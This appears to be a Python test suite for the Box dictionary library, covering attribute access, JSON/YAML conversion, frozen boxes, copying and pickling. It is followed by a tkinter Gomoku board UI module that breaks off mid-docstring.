        assert cns.bb.getfloat("Wooo", 4.4) == 4.4
        assert cns.bb.getboolean("huh", True) is True
        assert cns.bb.list("Waaaa", [1]) == [1]
        assert repr(cns).startswith("<ConfigBox")
    def test_protected_box_methods(self):
        """Box API methods cannot be overwritten or deleted."""
        my_box = Box(a=3)
        with pytest.raises(AttributeError):
            my_box.to_dict = 'test'
        with pytest.raises(AttributeError):
            del my_box.to_json
    def test_bad_args(self):
        """Two positional mappings raise TypeError."""
        with pytest.raises(TypeError):
            Box('123', '432')
    def test_box_inits(self):
        """kwargs override positional data; nested lists box correctly."""
        a = Box({'data': 2, 'count': 5})
        b = Box(data=2, count=5)
        c = Box({'data': 2, 'count': 1}, count=5)
        d = Box([('data', 2), ('count', 5)])
        e = Box({'a': [{'item': 3}, {'item': []}]})
        assert e.a[1].item == []
        assert a == b == c == d
    def test_bad_inits(self):
        """Non-mapping inputs raise ValueError/TypeError."""
        with pytest.raises(ValueError):
            Box("testing")
        with pytest.raises(ValueError):
            Box(22)
        with pytest.raises(TypeError):
            Box(22, 33)
    def test_create_subdicts(self):
        """Assigned dicts/lists are converted; to_dict() converts back."""
        a = Box({'data': 2, 'count': 5})
        a.brand_new = {'subdata': 1}
        assert a.brand_new.subdata == 1
        a.new_list = [{'sub_list_item': 1}]
        assert a.new_list[0].sub_list_item == 1
        assert isinstance(a.new_list, BoxList)
        a.new_list2 = [[{'sub_list_item': 2}]]
        assert a.new_list2[0][0].sub_list_item == 2
        b = a.to_dict()
        assert not isinstance(b['new_list'], BoxList)
    def test_to_json(self):
        """to_json round-trips via string and via file."""
        a = Box(test_dict)
        assert json.loads(a.to_json(indent=0)) == test_dict
        a.to_json(tmp_json_file)
        with open(tmp_json_file) as f:
            data = json.load(f)
        assert data == test_dict
    def test_to_yaml(self):
        """to_yaml round-trips via string."""
        a = Box(test_dict)
        assert yaml.load(a.to_yaml(), Loader=yaml.SafeLoader) == test_dict
    def test_to_yaml_file(self):
        """to_yaml round-trips via file."""
        a = Box(test_dict)
        a.to_yaml(tmp_yaml_file)
        with open(tmp_yaml_file) as f:
            data = yaml.load(f, Loader=yaml.SafeLoader)
        assert data == test_dict
    def test_boxlist(self):
        """BoxList construction, extend/append/insert, to_list conversion."""
        new_list = BoxList({'item': x} for x in range(0, 10))
        new_list.extend([{'item': 22}])
        assert new_list[-1].item == 22
        new_list.append([{'bad_item': 33}])
        assert new_list[-1][0].bad_item == 33
        assert repr(new_list).startswith("<BoxList:")
        for x in new_list.to_list():
            assert not isinstance(x, (BoxList, Box))
        new_list.insert(0, {'test': 5})
        new_list.insert(1, ['a', 'b'])
        new_list.append('x')
        assert new_list[0].test == 5
        assert isinstance(str(new_list), str)
        assert isinstance(new_list[1], BoxList)
        assert not isinstance(new_list.to_list(), BoxList)
    def test_dir(self):
        """dir() exposes safe keys, API methods, and camel-killed names."""
        a = Box(test_dict, camel_killer_box=True)
        assert 'key1' in dir(a)
        assert 'not$allowed' not in dir(a)
        assert 'Key4' in a['Key 2']
        for item in ('to_yaml', 'to_dict', 'to_json'):
            assert item in dir(a)
        assert a.big_camel == 'hi'
        assert 'big_camel' in dir(a)
        b = ConfigBox(test_dict)
        for item in ('to_yaml', 'to_dict', 'to_json', 'int', 'list', 'float'):
            assert item in dir(b)
    def test_update(self):
        """update() merges dicts recursively (unlike plain dict.update)."""
        a = Box(test_dict)
        a.grand = 1000
        a.update({'key1': {'new': 5}, 'Key 2': {"add_key": 6},
                  'lister': ['a']})
        a.update([('asdf', 'fdsa')])
        a.update(testkey=66)
        a.update({'items': {'test': 'pme'}})
        a.update({'key1': {'gg': 4}})
        b = Box()
        b.update(item=1)
        assert a.grand == 1000
        assert a['grand'] == 1000
        assert isinstance(a['items'], Box)
        assert a['items'].test == 'pme'
        assert a.key1.new == 5
        assert a['Key 2'].add_key == 6
        assert isinstance(a.key1, Box)
        assert isinstance(a.lister, BoxList)
        assert a.asdf == 'fdsa'
        assert a.testkey == 66
        assert a.key1.new == 5  # On regular dict update this shouldn't happen
        assert a.key1.gg == 4
        c = Box(box_intact_types=[list])
        c.a = [1, 2]
        c.update({'b': [3, 4]})
        assert c.a == [1, 2]
        assert isinstance(c.b, list)
        assert not isinstance(c.b, BoxList)
    def test_auto_attr(self):
        """default_box auto-creates nested Boxes on attribute access."""
        a = Box(test_dict, default_box=True)
        assert a.a.a.a.a == Box()
        a.b.b = 4
        assert a.b.b == 4
    def test_set_default(self):
        """setdefault converts values and propagates default_box behavior."""
        a = Box(test_dict)
        new = a.setdefault("key3", {'item': 2})
        new_list = a.setdefault("lister", [{'gah': 7}])
        assert a.setdefault("key1", False) == 'value1'
        assert new == Box(item=2)
        assert new_list == BoxList([{'gah': 7}])
        assert a.key3.item == 2
        assert a.lister[0].gah == 7
        # default_box propagates after a setdefault and list object
        a = Box(default_box=True)
        a.b.c.setdefault('d', [])
        a.b.c.d.append({})
        a.b.c.d[0].e.f = 1
        assert a.b.c.d[0].e.f == 1
        # without default_box we would get an error
        a = Box()
        a.setdefault('b', [])
        a.b.append({})
        with self.assertRaises(BoxKeyError):
            a.b[0].c.d = 1
        a = Box()
        a.setdefault('b', {})
        with self.assertRaises(BoxKeyError):
            a.b.c.d = 1
        a = Box(default_box=True)
        a.setdefault('b', {})
        a.b.c.d.e.f = 1
        assert a.b.c.d.e.f == 1
    def test_from_json_file(self):
        """from_json(filename=...) loads a file into a Box."""
        bx = Box.from_json(filename=data_json_file)
        assert isinstance(bx, Box)
        assert bx.widget.window.height == 500
    def test_from_yaml_file(self):
        """from_yaml(filename=...) loads a file into a Box."""
        bx = Box.from_yaml(filename=data_yaml_file)
        assert isinstance(bx, Box)
        assert bx.total == 4443.52
    def test_from_json(self):
        """from_json accepts a JSON string."""
        bx = Box.from_json(json.dumps(test_dict))
        assert isinstance(bx, Box)
        assert bx.key1 == 'value1'
    def test_from_yaml(self):
        """from_yaml accepts a YAML string plus Box kwargs."""
        bx = Box.from_yaml(yaml.dump(test_dict),
                           conversion_box=False,
                           default_box=True)
        assert isinstance(bx, Box)
        assert bx.key1 == 'value1'
        assert bx.Key_2 == Box()
    def test_bad_from_json(self):
        """Missing input or a non-object JSON document raises BoxError."""
        with pytest.raises(BoxError) as err:
            Box.from_json()
        with pytest.raises(BoxError) as err2:
            Box.from_json(json_string="[1]")
    def test_bad_from_yaml(self):
        """Missing input or a scalar YAML document raises BoxError."""
        with pytest.raises(BoxError) as err:
            Box.from_yaml()
        with pytest.raises(BoxError) as err2:
            Box.from_yaml('lol')
    def test_conversion_box(self):
        """conversion_box maps unsafe keys to safe attribute names."""
        bx = Box(extended_test_dict, conversion_box=True)
        assert bx.Key_2.Key_3 == "Value 3"
        assert bx.x3 == 'howdy'
        assert bx.xnot == 'true'
        assert bx.x3_4 == 'test'
        with pytest.raises(AttributeError):
            getattr(bx, "(3, 4)")
    def test_frozen(self):
        """frozen_box forbids all mutation and makes the Box hashable."""
        bx = Box(extended_test_dict, frozen_box=True)
        assert isinstance(bx.alist, tuple)
        assert bx.alist[0] == {'a': 1}
        with pytest.raises(BoxError):
            bx.new = 3
        with pytest.raises(BoxError):
            bx['new'] = 3
        with pytest.raises(BoxError):
            del bx['not']
        with pytest.raises(BoxError):
            delattr(bx, "key1")
        with pytest.raises(TypeError):
            hash(bx)
        bx2 = Box(test_dict)
        with pytest.raises(TypeError):
            hash(bx2)
        bx3 = Box(test_dict, frozen_box=True)
        assert hash(bx3)
    def test_hashing(self):
        """Frozen Box/BoxList hashes are order-insensitive for dicts only."""
        bx1 = Box(t=3, g=4, frozen_box=True)
        bx2 = Box(g=4, t=3, frozen_box=True)
        assert hash(bx1) == hash(bx2)
        bl1 = BoxList([1, 2, 3, 4], frozen_box=True)
        bl2 = BoxList([1, 2, 3, 4], frozen_box=True)
        bl3 = BoxList([2, 1, 3, 4], frozen_box=True)
        assert hash(bl2) == hash(bl1)
        assert hash(bl3) != hash(bl2)
        with pytest.raises(TypeError):
            hash(BoxList([1, 2, 3]))
    def test_frozen_list(self):
        """frozen_box blocks every mutating BoxList method."""
        bl = BoxList([5, 4, 3], frozen_box=True)
        with pytest.raises(BoxError):
            bl.pop(1)
        with pytest.raises(BoxError):
            bl.remove(4)
        with pytest.raises(BoxError):
            bl.sort()
        with pytest.raises(BoxError):
            bl.reverse()
        with pytest.raises(BoxError):
            bl.append('test')
        with pytest.raises(BoxError):
            bl.extend([4])
        with pytest.raises(BoxError):
            del bl[0]
        with pytest.raises(BoxError):
            bl[0] = 5
        bl2 = BoxList([5, 4, 3])
        del bl2[0]
        assert bl2[0] == 4
        bl2[1] = 4
        assert bl2[1] == 4
    def test_config(self):
        """_box_config attribute is readable but protected from deletion."""
        bx = Box(extended_test_dict)
        assert bx['_box_config'] is True
        assert isinstance(bx._box_config, dict)
        with pytest.raises(BoxError):
            delattr(bx, '_box_config')
        bx._box_config
    def test_default_box(self):
        """default_box_attr controls the value returned for missing keys."""
        bx = Box(test_dict, default_box=True, default_box_attr={'hi': 'there'})
        assert bx.key_88 == {'hi': 'there'}
        bx2 = Box(test_dict, default_box=True, default_box_attr=Box)
        assert isinstance(bx2.key_77, Box)
        bx3 = Box(default_box=True, default_box_attr=3)
        assert bx3.hello == 3
        bx4 = Box(default_box=True, default_box_attr=ConfigBox)
        assert isinstance(bx4.bbbbb, ConfigBox)
    def test_camel_killer_box(self):
        """camel_killer_box snake-cases CamelCase keys (with/without conversion)."""
        td = extended_test_dict.copy()
        td['CamelCase'] = 'Item'
        td['321CamelCaseFever!'] = 'Safe'
        kill_box = Box(td, camel_killer_box=True, conversion_box=False)
        assert kill_box.camel_case == 'Item'
        assert kill_box['321CamelCaseFever!'] == 'Safe'
        con_kill_box = Box(td, conversion_box=True, camel_killer_box=True)
        assert con_kill_box.camel_case == 'Item'
        assert con_kill_box.x321_camel_case_fever == 'Safe'
    def test_default_and_camel_killer_box(self):
        """camel_killer + default_box: both spellings work, misses give a Box."""
        td = extended_test_dict.copy()
        td['CamelCase'] = 'Item'
        killer_default_box = Box(td, camel_killer_box=True, default_box=True)
        assert killer_default_box.camel_case == 'Item'
        assert killer_default_box.CamelCase == 'Item'
        assert isinstance(killer_default_box.does_not_exist, Box)
        assert isinstance(killer_default_box['does_not_exist'], Box)
    def test_property_box(self):
        """SBox exposes .json/.yaml/.dict shorthand properties."""
        td = test_dict.copy()
        td['inner'] = {'CamelCase': 'Item'}
        pbox = SBox(td, camel_killer_box=True)
        assert isinstance(pbox.inner, SBox)
        assert pbox.inner.camel_case == 'Item'
        assert json.loads(pbox.json)['inner']['CamelCase'] == 'Item'
        test_item = yaml.load(pbox.yaml, Loader=yaml.SafeLoader)
        assert test_item['inner']['CamelCase'] == 'Item'
        assert repr(pbox['inner']).startswith('<ShorthandBox')
        assert not isinstance(pbox.dict, Box)
        assert pbox.dict['inner']['CamelCase'] == 'Item'
    def test_box_list_to_json(self):
        """BoxList serializes to a JSON array."""
        bl = BoxList([{'item': 1, 'CamelBad': 2}])
        assert json.loads(bl.to_json())[0]['item'] == 1
    def test_box_list_from_json(self):
        """BoxList.from_json parses arrays; objects raise BoxError."""
        alist = [{'item': 1}, {'CamelBad': 2}]
        json_list = json.dumps(alist)
        bl = BoxList.from_json(json_list, camel_killer_box=True)
        assert bl[0].item == 1
        assert bl[1].camel_bad == 2
        with pytest.raises(BoxError):
            BoxList.from_json(json.dumps({'a': 2}))
    def test_box_list_to_yaml(self):
        """BoxList serializes to a YAML sequence."""
        bl = BoxList([{'item': 1, 'CamelBad': 2}])
        assert yaml.load(bl.to_yaml(), Loader=yaml.SafeLoader)[0]['item'] == 1
    def test_box_list_from_yaml(self):
        """BoxList.from_yaml parses sequences; mappings raise BoxError."""
        alist = [{'item': 1}, {'CamelBad': 2}]
        yaml_list = yaml.dump(alist)
        bl = BoxList.from_yaml(yaml_list, camel_killer_box=True)
        assert bl[0].item == 1
        assert bl[1].camel_bad == 2
        with pytest.raises(BoxError):
            BoxList.from_yaml(yaml.dump({'a': 2}))
    def test_boxlist_box_it_up(self):
        """box_it_up eagerly converts nested structures."""
        bxl = BoxList([extended_test_dict])
        bxl.box_it_up()
        assert "Key 3" in bxl[0].Key_2._box_config['__converted']
    def test_box_modify_tuples(self):
        """modify_tuples_box converts dicts inside tuples but keeps the tuple."""
        bx = Box(extended_test_dict, modify_tuples_box=True)
        assert bx.tuples_galore[0].item == 3
        assert isinstance(bx.tuples_galore[0], Box)
        assert isinstance(bx.tuples_galore[1], tuple)
    def test_box_set_attribs(self):
        """Setting by safe attribute name writes through to the original key."""
        bx = Box(extended_test_dict, conversion_box=False,
                 camel_killer_box=True)
        bx.camel_case = {'new': 'item'}
        assert bx['CamelCase'] == Box(new='item')
        bx2 = Box(extended_test_dict)
        bx2.Key_2 = 4
        assert bx2["Key 2"] == 4
    def test_functional_hearthstone_data(self):
        """Large real-world JSON: config is shared across nesting levels."""
        hearth = Box.from_json(filename=data_hearthstone,
                               conversion_box=True,
                               camel_killer_box=True,
                               default_box=False)
        assert hearth.the_jade_lotus
        with pytest.raises(AttributeError):
            hearth._bad_value
        with pytest.raises(AttributeError):
            hearth.the_jade_lotus._bad_value
        base_config = hearth._Box__box_config()
        jade_config = hearth.the_jade_lotus._Box__box_config()
        assert base_config == jade_config, "{} != {}".format(base_config,
                                                             jade_config)
    def test_functional_spaceballs(self):
        """Mutating nested movie data through attribute paths."""
        my_box = Box(movie_data)
        my_box.movies.Spaceballs.Stars.append(
            {"name": "Bill Pullman", "imdb": "nm0000597",
             "role": "Lone Starr"})
        assert my_box.movies.Spaceballs.Stars[-1].role == "Lone Starr"
        assert my_box.movies.Robin_Hood_Men_in_Tights.length == 104
        my_box.movies.Robin_Hood_Men_in_Tights.Stars.pop(0)
        assert my_box.movies.Robin_Hood_Men_in_Tights.Stars[
            0].name == "Richard Lewis"
    def test_circular_references(self):
        """Self-referencing dicts/lists survive boxing; JSON export fails."""
        circular_dict = {}
        circular_dict['a'] = circular_dict
        bx = Box(circular_dict, box_it_up=True)
        assert bx.a.a == bx.a
        circular_dict_2 = bx.a.a.a.to_dict()
        assert str(circular_dict_2) == "{'a': {...}}"
        bx2 = Box(circular_dict, k=circular_dict)
        assert bx2.k == bx2.a
        with pytest.raises(ValueError):
            bx.to_json()
        circular_list = []
        circular_list.append(circular_list)
        bl = BoxList(circular_list)
        assert bl == bl[0]
        assert isinstance(bl[0], BoxList)
        circular_list_2 = bl.to_list()
        assert circular_list_2 == circular_list_2[0]
        assert isinstance(circular_list_2, list)
    def test_to_multiline(self):
        """multiline=True writes one JSON object per line."""
        a = BoxList([Box(a=1), Box(b=2), Box(three=5)])
        a.to_json(tmp_json_file, multiline=True)
        count = 0
        with open(tmp_json_file) as f:
            for line in f:
                assert isinstance(json.loads(line), dict)
                count += 1
        assert count == 3
    def test_from_multiline(self):
        """multiline=True reads newline-delimited JSON, skipping blank lines."""
        content = '{"a": 2}\n{"b": 3}\r\n \n'
        with open(tmp_json_file, 'w') as f:
            f.write(content)
        a = BoxList.from_json(filename=tmp_json_file, multiline=True)
        assert a[1].b == 3
    def test_duplicate_errors(self):
        """box_duplicates: 'error' raises, 'ignore' passes, 'warn' warns."""
        with pytest.raises(BoxError) as err:
            Box({"?a": 1, "!a": 3}, box_duplicates="error")
        Box({"?a": 1, "!a": 3}, box_duplicates="ignore")
        with pytest.warns(UserWarning) as warning:
            Box({"?a": 1, "!a": 3}, box_duplicates="warn")
        assert warning[0].message.args[0].startswith("Duplicate")
        my_box = Box({"?a": 1}, box_duplicates="error")
        with pytest.raises(BoxError):
            my_box['^a'] = 3
    def test_copy(self):
        """copy/deepcopy/__copy__ preserve values, types and options."""
        my_box = Box(movie_data, camel_killer_box=True)
        my_box.aB = 1
        bb = my_box.copy()
        assert my_box == bb
        assert isinstance(bb, Box)
        aa = copy.deepcopy(my_box)
        assert my_box == aa
        assert my_box.a_b == 1
        assert isinstance(aa, Box)
        cc = my_box.__copy__()
        assert my_box == cc
        assert isinstance(cc, Box)
        dd = BoxList([my_box])
        assert dd == copy.copy(dd)
        assert isinstance(copy.copy(dd), BoxList)
    def test_deepcopy_of_frozen_box(self):
        """deepcopy of a frozen Box yields an equal but distinct object."""
        my_box = Box(data={'a': movie_data,
                           'b': Box(movie_data, frozen_box=True)},
                     frozen_box=True)
        aa = copy.deepcopy(my_box)
        assert my_box == aa
        assert id(my_box) != id(aa)
        assert isinstance(aa, Box)
    def test_custom_key_errors(self):
        """BoxKeyError is catchable as AttributeError, KeyError, or BoxError."""
        my_box = Box()
        with pytest.raises(BoxKeyError):
            my_box.g
        with pytest.raises(AttributeError):
            my_box.g
        with pytest.raises(KeyError):
            my_box['g']
        with pytest.raises(BoxKeyError):
            my_box['g']
        with pytest.raises(BoxError):
            my_box['g']
    def test_pickle(self):
        """Pickle round-trips preserve data and box configuration."""
        pic_file = os.path.join(tmp_dir, 'test.p')
        pic2_file = os.path.join(tmp_dir, 'test.p2')
        bb = Box(movie_data, conversion_box=False)
        with open(pic_file, 'wb') as pf:
            pickle.dump(bb, pf)
        with open(pic_file, 'rb') as pf:
            loaded = pickle.load(pf)
        assert bb == loaded
        assert loaded._box_config['conversion_box'] is False
        ll = [[Box({'a': 'b'}, ordered_box=True)], [[{'c': 'g'}]]]
        bx = BoxList(ll)
        with open(pic2_file, 'wb') as pf:
            pickle.dump(bx, pf)
        with open(pic2_file, 'rb') as pf:
            loaded2 = pickle.load(pf)
        assert bx == loaded2
        loaded2.box_options = bx.box_options
    def test_pickle_default_box(self):
        """default_box Boxes pickle round-trip too."""
        bb = Box(default_box=True)
        loaded = pickle.loads(pickle.dumps(bb))
        assert bb == loaded
    def test_conversion_dup_only(self):
        """box_duplicates='error' requires conversion_box to be enabled."""
        with pytest.raises(BoxError):
            Box(movie_data, conversion_box=False, box_duplicates='error')
    def test_values(self):
        """values() yields converted Box/BoxList objects."""
        b = Box()
        b.foo = {}
        assert isinstance(list(b.values())[0], Box)
        c = Box()
        c.foohoo = []
        assert isinstance(list(c.values())[0], BoxList)
        d = Box(movie_data)
        assert len(movie_data["movies"].values()) == len(d.movies.values())
    def test_items(self):
        """items() yields converted values as well."""
        b = Box()
        b.foo = {}
        assert isinstance(list(b.items())[0][1], Box)
        c = Box()
        c.foohoo = []
        assert isinstance(list(c.items())[0][1], BoxList)
        d = Box(movie_data)
        assert len(movie_data["movies"].items()) == len(d.movies.items())
    def test_get(self):
        """get() converts both stored values and supplied defaults."""
        bx = Box()
        bx["c"] = {}
        assert isinstance(bx.get("c"), Box)
        assert isinstance(bx.get("b", {}), Box)
        assert "a" in bx.get("a", Box(a=1, conversion_box=False))
        assert isinstance(bx.get("a", [1, 2]), BoxList)
    def test_get_default_box(self):
        """get() on a default_box honors explicit defaults, else returns a Box."""
        bx = Box(default_box=True)
        assert bx.get('test', 4) == 4
        assert isinstance(bx.get('a'), Box)
    def test_is_in(self):
        """`in` works and default_box does not fabricate membership."""
        bx = Box()
        dbx = Box(default_box=True)
        assert "a" not in bx
        assert "a" not in dbx
        bx["b"] = 1
        dbx["b"] = {}
        assert "b" in bx
        assert "b" in dbx
def test_through_queue(self):
my_box = Box(a=4, c={"d": 3})
queue = Queue()
queue.put(my_box)
p = Process(target=mp_queue_test, args=(queue,))
p.start()
p.join()
assert queue.get(timeout=1)
def test_update_with_integer(self):
bx = Box()
bx[1] = 4
assert bx[1] == 4
bx.update({1: 2})
assert bx[1] == 2
def test_get_box_config(self):
bx = Box()
bx_config = bx.__getattr__('_box_config')
assert bx_config
with pytest.raises(BoxKeyError):
bx['_box_config']
def test_ordered_box(self):
bx = Box(h=1, ordered_box=True)
bx.a = 1
bx.c = 4
bx['g'] = 7
bx.d = 2
assert bx.keys() == ['h', 'a', 'c', 'g', 'd']
assert list(bx.__iter__()) == ['h', 'a', 'c', 'g', 'd']
assert list(reversed(bx)) == ['d', 'g', 'c', 'a', 'h']
del bx.a
bx.pop('c')
bx.__delattr__('g')
assert bx.keys() == ['h', 'd']
def test_intact_types_dict(self):
from collections import OrderedDict
bx = Box(a=OrderedDict([('y', 1), ('x', 2)]))
assert isinstance(bx.a, Box)
assert not isinstance(bx.a, OrderedDict)
bx = Box(a=OrderedDict([('y', 1), ('x', 2)]),
box_intact_types=[OrderedDict])
assert isinstance(bx.a, OrderedDict)
assert not isinstance(bx.a, Box)
def test_intact_types_list(self):
class MyList(list):
pass
bl = BoxList([[1, 2], MyList([3, 4])], box_intact_types=(MyList,))
assert isinstance(bl[0], BoxList)
def test_pop(self):
bx = Box(a=4, c={"d": 3}, b={"h": {"y": 2}})
assert bx.pop('a') == 4
assert bx.pop('b').h.y == 2
with pytest.raises(BoxKeyError):
bx.pop('b')
assert bx.pop('a', None) is None
assert bx.pop('a', True) is True
assert bx == {'c': {"d": 3}}
with pytest.raises(BoxError):
bx.pop(1, 2, 3)
assert bx.pop('c', True) is not True
def test_pop_items(self):
bx = Box(a=4)
assert bx.popitem() == ('a', 4)
with pytest.raises(BoxKeyError):
assert bx.popitem()
def test_iter(self):
bx = Box(ordered_box=True)
bx.a = 1
bx.c = 2
assert list(bx.__iter__()) == ['a', 'c']
def test_revered(self):
bx = Box(ordered_box=True)
bx.a = 1
bx.c = 2
assert list(reversed(bx)) == ['c', 'a']
def test_clear(self):
bx = Box(ordered_box=True)
bx.a = 1
bx.c = 4
bx['g'] = 7
bx.d = 2
assert bx.keys() == ['a', 'c', 'g', 'd']
bx.clear()
assert bx == {}
assert bx.keys() == []
def test_bad_recursive(self):
b = Box()
bl = b.setdefault("l", [])
bl.append(["foo"])
assert bl == [['foo']], bl
def test_inheritance_copy(self):
class Box2(Box):
pass
class SBox2(SBox):
pass
class ConfigBox2(ConfigBox):
pass
b = Box2(a=1)
c = b.copy()
assert c == b
assert isinstance(c, Box)
c = b.__copy__()
assert c == b
assert isinstance(c, Box)
d = SBox2(a=1)
e = d.copy()
assert e == d
assert isinstance(e, SBox)
e = d.__copy__()
assert e == d
assert isinstance(e, SBox)
f = ConfigBox2(a=1)
g = f.copy()
assert g == f
assert isinstance(g, ConfigBox)
g = f.__copy__()
assert g == f
assert isinstance(g, ConfigBox)
class TestBoxObject:
    """Tests for BoxObject, a transparent wrapper with a Box __dict__."""

    @pytest.mark.parametrize('wrapped', python_example_objects)
    def test_box_object_generic(self, wrapped):
        proxy = BoxObject(wrapped)
        # equal to, but distinct from, the wrapped object
        assert proxy == wrapped
        assert proxy is not wrapped
        assert isinstance(proxy, BoxObject)
        assert isinstance(proxy, type(wrapped))
        proxy.box_key = 'secret_word'
        assert proxy.box_key == 'secret_word'
        assert 'box_key' in proxy.__dict__
        assert isinstance(proxy.__dict__, Box)
        assert proxy.__dict__ != getattr(proxy.__wrapped__, '__dict__', None)
        with pytest.raises(AttributeError):
            proxy.foo
        if hasattr(proxy.__wrapped__, 'b'):
            proxy.b = 1
            assert proxy.__wrapped__.b == 1

    @pytest.mark.parametrize('wrapped', python_example_objects)
    def test_box_object_deletion(self, wrapped):
        proxy = BoxObject(wrapped)
        with pytest.raises(TypeError):
            proxy.__dict__ = 0
        # deleting __dict__ falls back to the wrapped object's namespace
        del proxy.__dict__
        assert proxy.__dict__ == getattr(proxy.__wrapped__, '__dict__', {})
        with pytest.raises(AttributeError):
            del proxy.foo
        if hasattr(proxy.__wrapped__, 'a'):
            del proxy.a
        if not hasattr(proxy.__wrapped__, 'b'):
            with pytest.raises(AttributeError):
                del proxy.b

    def test_box_object_attributes(self):
        proxy = BoxObject(test_dict, **movie_data)
        assert proxy == test_dict
        assert proxy is not test_dict
        assert proxy.__dict__ == movie_data
        assert isinstance(proxy.__dict__, Box)
        assert proxy.__dict__ != getattr(proxy.__wrapped__, '__dict__', None)
        for key, value in movie_data.items():
            assert getattr(proxy, key) == value
            alias = key + '_b'
            setattr(proxy, alias, [value])
            assert getattr(proxy, alias) == [value]
            setattr(proxy, key, getattr(proxy, alias))
            assert getattr(proxy, key) == [value]
        for key, value in test_dict.items():
            assert key in proxy
            assert proxy[key] == value

    def test_box_object_call(self):
        def echo(*args, **kwargs):
            return args, kwargs

        proxy = BoxObject(echo)
        expected = echo(list(test_dict), **movie_data)
        assert proxy(list(test_dict), **movie_data) == expected

    def test_box_object_double_args(self):
        # positional payload plus keyword data is ambiguous and rejected
        with pytest.raises(TypeError):
            BoxObject(function_example,
                      zip([1, 2, 3], [4, 5, 6]),
                      **movie_data)
def mp_queue_test(q):
    """Child-process helper: pull a Box off *q* and post back True/False."""
    candidate = q.get(timeout=1)
    try:
        assert isinstance(candidate, Box)
        assert candidate.a == 4
    except AssertionError:
        q.put(False)
    else:
        q.put(True)
|
ui.py | import threading
import queue
from tkinter import *
from tkinter import messagebox
from config import *
CW = 30
R = 10
class Scaler:
    """坐标变换器 (linear coordinate transformer).

    Maps values from the interval [start, end] onto the interval set
    via :meth:`bind` using linear interpolation.
    """

    def __init__(self, start, end):
        self.start = start
        self.end = end

    def bind(self, start, end):
        """Set the target interval; returns self so calls can be chained."""
        self.new_start = start
        self.new_end = end
        return self

    def inverse(self):
        """Return a Scaler performing the opposite mapping."""
        return Scaler(self.new_start, self.new_end).bind(self.start, self.end)

    def __call__(self, value):
        """Linearly interpolate *value* into the bound target interval."""
        source_span = self.end - self.start
        target_span = self.new_end - self.new_start
        return (value - self.start) / source_span * target_span + self.new_start
class BinaryScaler:
    """二元坐标变换器 (2-D transformer built from two Scalers, one per axis)."""

    def __init__(self, start_x, start_y, end_x, end_y):
        self.X = Scaler(start_x, end_x)
        self.Y = Scaler(start_y, end_y)

    def bind(self, start_x, start_y, end_x, end_y):
        """Bind target ranges for both axes; returns self for chaining."""
        self.X.bind(start_x, end_x)
        self.Y.bind(start_y, end_y)
        return self

    def inverse(self):
        """Return a BinaryScaler performing the opposite mapping."""
        flipped = BinaryScaler(self.X.new_start, self.Y.new_start,
                               self.X.new_end, self.Y.new_end)
        return flipped.bind(self.X.start, self.Y.start, self.X.end, self.Y.end)

    def __call__(self, value_x, value_y):
        """Transform the pair (value_x, value_y)."""
        return self.X(value_x), self.Y(value_y)
class UI:
    """UI 基类 (abstract base class for game front-ends)."""

    def __init__(self, board_shape):
        self.board_shape = board_shape
        self.width, self.height = board_shape

    def render(self, board, last_move):
        """Draw the board after a move."""
        raise NotImplementedError

    def message(self, message):
        """Show a message to the player."""
        raise NotImplementedError

    def reset(self):
        """Clear the display for a new game."""
        raise NotImplementedError

    def input(self):
        """Return the player's chosen coordinate."""
        raise NotImplementedError

    def game_start(self, game_loop):
        """Run the game loop; subclasses may move it onto a worker thread."""
        game_loop()
class GUI(UI):
    """棋盘图形 UI — tkinter-based board view."""

    name = "GUI"
    # Clicks arrive on the tkinter thread; the game loop consumes them here.
    POINT_QUEUE = queue.Queue()

    def __init__(self, board_shape):
        super().__init__(board_shape)
        self.tk = Tk()
        self.tk.geometry("{}x{}".format(self.width * CW + 100, self.height * CW + 100))
        self.tk.title("Gomoku")
        self.bc = None        # pixel -> board coordinate transformer
        self.canvas = None
        # canvas item ids grouped by layer so layers can be cleared separately
        self.figures = {"chess": [], "flag": [], "board": []}
        self._init_canvas()
        self._init_board()
        self.last_move = ()

    def _init_canvas(self):
        """Create the canvas and translate click positions to board coordinates."""
        canvas_width, canvas_height = self.width * CW, self.height * CW
        bc = BinaryScaler(0, 0, canvas_width, canvas_height).bind(-1, self.height, self.width, -1)
        self.bc = bc
        self.canvas_width, self.canvas_height = canvas_width, canvas_height
        canvas = Canvas(self.tk, width=canvas_width, height=canvas_height, bg="orange")
        self.canvas = canvas

        def on_click(event):
            x, y = bc(event.x, event.y)
            GUI.POINT_QUEUE.put((round(x), round(y)))

        canvas.bind("<ButtonRelease-1>", on_click)

    def _line(self, x1, y1, x2, y2, color="black", name="board"):
        """Draw a line given in board coordinates on layer *name*."""
        bc_ = self.bc.inverse()
        x1, y1 = bc_(x1, y1)
        x2, y2 = bc_(x2, y2)
        figure_id = self.canvas.create_line(x1, y1, x2, y2, fill=color)
        self.figures[name].append(figure_id)

    def _init_board(self):
        """Draw the grid lines and place the canvas in the window."""
        for i in range(self.height):
            self._line(0, i, self.width - 1, i, name="board")
        for i in range(self.width):
            self._line(i, 0, i, self.height - 1, name="board")
        self.canvas.place(x=50, y=50, anchor="nw")

    def _circle(self, x, y, radius=R, color="blue", name="chess"):
        """Draw a stone centred on board coordinate (x, y) on layer *name*."""
        bc_ = self.bc.inverse()
        x_pix, y_pix = bc_(x, y)
        figure_id = self.canvas.create_oval(x_pix - radius, y_pix - radius,
                                            x_pix + radius, y_pix + radius, fill=color)
        self.figures[name].append(figure_id)

    def _delete(self, name):
        """Remove every canvas item belonging to layer *name*."""
        for figure_id in self.figures[name]:
            self.canvas.delete(figure_id)
        self.figures[name].clear()

    def _clear(self):
        """Remove all drawn items from every layer."""
        for name in self.figures:
            self._delete(name)

    def render(self, board, last_move):
        """Draw the stone of *last_move* and mark it with a cross in the
        opposing colour on the transient "flag" layer."""
        self._delete(name="flag")
        self._circle(*last_move, color=COLOR[board[last_move]], name="chess")
        self._line(
            last_move[0],
            last_move[1] - 0.2,
            last_move[0],
            last_move[1] + 0.2,
            color=COLOR[-board[last_move]],
            name="flag",
        )
        self._line(
            last_move[0] - 0.2,
            last_move[1],
            last_move[0] + 0.2,
            last_move[1],
            color=COLOR[-board[last_move]],
            name="flag",
        )

    def message(self, message):
        """Pop up an info dialog."""
        messagebox.showinfo("INFO", message)

    def reset(self):
        """Wipe the canvas and redraw the empty grid."""
        self._clear()
        self._init_board()

    def input(self):
        """Block until the player clicks, discarding clicks queued earlier."""
        GUI.POINT_QUEUE.queue.clear()
        x, y = GUI.POINT_QUEUE.get()
        return x, y

    def game_start(self, game_loop):
        """Run the game loop on a daemon worker thread; tkinter keeps the
